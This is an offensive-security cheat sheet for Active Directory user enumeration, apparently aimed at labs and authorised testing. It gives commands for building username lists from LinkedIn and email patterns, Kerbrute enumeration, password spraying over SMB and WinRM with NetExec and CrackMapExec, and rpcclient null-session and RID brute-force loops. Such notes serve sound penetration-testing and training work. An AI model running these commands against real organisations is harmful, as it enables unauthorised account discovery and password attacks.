Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Generate User List
-
Use sites like hunter.io to discover employee email patterns.
For example, entering apple.com shows emails often follow {f}{last}@apple.com.
By scraping a list of Apple employees from LinkedIn, you can convert names into emails (e.g., Steve Jobs → s.jobs@apple.com).
Not all guesses will be correct, but many should be valid.
-
Use a Python script to generate potential usernames
wget https://gist.githubusercontent.com/superkojiman/11076951/raw/74f3de7740acb197ecfa8340d07d3926a95e5d46/namemash.py
-
Verify usernames with Kerbrute
kerbrute userenum --dc [IP-ADDRESS] -d hackfast.local username.lst
Note: You can also use built-in wordlists, e.g.:
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
SMB Enumeration
-
Enumerate with NetExec
netexec smb [IP-ADDRESS] -u users.txt -p '[PASSWORD]' --continue-on-success
-
Enumerate with CrackMapExec
crackmapexec smb [IP-ADDRESS] -u users.txt -p '[PASSWORD]' --continue-on-success
WinRM Enumeration
-
Enumerate with NetExec
netexec winrm office.htb -u users.txt -p '[PASSWORD]' --continue-on-success
-
Enumerate with CrackMapExec
crackmapexec winrm 10.10.10.184 -u users.txt -p '[PASSWORD]' --continue-on-success
RPCClient Enumeration
-
Start null session
rpcclient -U "" -N [IP_ADDRESS]
-
List all users in the domain
rpcclient -U "" -N [IP_ADDRESS] -c "enumdomusers" > output.txt
-
Extract usernames from output
cat output.txt | awk -F\[ '{print $2}' | awk -F\] '{print $1}' > users.lst
-
Brute-force user RIDs
for i in $(seq 500 1100); do rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name|user_rid|group_rid" && echo ""; done